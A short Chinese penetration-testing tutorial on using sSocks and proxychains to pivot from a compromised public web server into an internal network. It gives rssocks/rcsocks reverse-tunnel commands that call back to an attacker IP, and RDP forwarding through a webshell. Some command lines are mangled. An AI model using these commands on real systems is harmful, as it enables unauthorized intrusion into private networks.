# 利用ssocks进行内网穿透
sSocks是一个socks代理工具套装,可用来开启socks代理服务,支持socks5验证,支持IPV6和UDP,并提供反向socks代理服务,即将远程计算机作为socks代理服务端,反弹回本地,极大方便内网的渗透测试,而proxychains代理链是Linux下一款代理设置工具。由于Ssocks不稳定,所以不建议使用。
现在有这么一个环境,我们获取到了位于公网Web服务器的shell,该web服务器是Linux系统,内网中存在另外一台主机,这里假设内网存在一台Web服务器。然后,我们现在要将公网Web服务器设置为代理,访问和探测内网Web服务器的信息。
首先,我们的主机和公网的Web服务器都得安装上Ssocks。
proxychains的话 linux(基于debian)下直接apt install proxychains 就可以了
####Web服务器的操作
“`
./rssocks -vv -s 100.100.10.13:9999 #接收100.100.10.13的9999端口的流量
“`
![](/static/lingzu/images/15897827417363.png)
## 主机的操作
“`
首先配置proxychains代理链的配置文件,把最后的内容改成 socks5 127.0.0.1 8080
./rcsocks -l 1080 -p 9999 -vv #然后将本地的1080端口的流量转发到9999端口
接下来,我们想要访问和操作操作内网主机192.168.10.19的话,只需要在命令前面加上 proxychains
比如,获得内网Web服务器的网页文件: proxychains curl 192.168.10.19
“`
![](/static/lingzu/images/15897827483376.png)
![](/static/lingzu/images/15897827514968.png)
## ssocks转发的其他操作
“`bash
第一步,用sSocks在VPS上建立3388与3389端口对应关系,实现流量互通:
root @ kali:〜#/ root / ssocks-0.0.14 / src / rcsocks -l 3389 -p 3389 -vv
第二步,从攻击端连接VPS的3388端口,建议用freerdp而非rdesktop,因为前者支持远程与本地连接等待,文本复制粘贴,挂载远程文件系统:
root @kali:〜#xfreerdp / u:administrator / p:admin / v:【你的ip】:3389
第三步,立即在大马上执行端口转发,可能需要连续多次点击开始:
注意,整个过程对步骤先后顺序敏感,VPS上rcsocks端口映射好以后就可以不管了,先在攻击端执行xfreerdp,让其会话保持,再在webshell上转发内网的3389。
“`
请登录后查看评论内容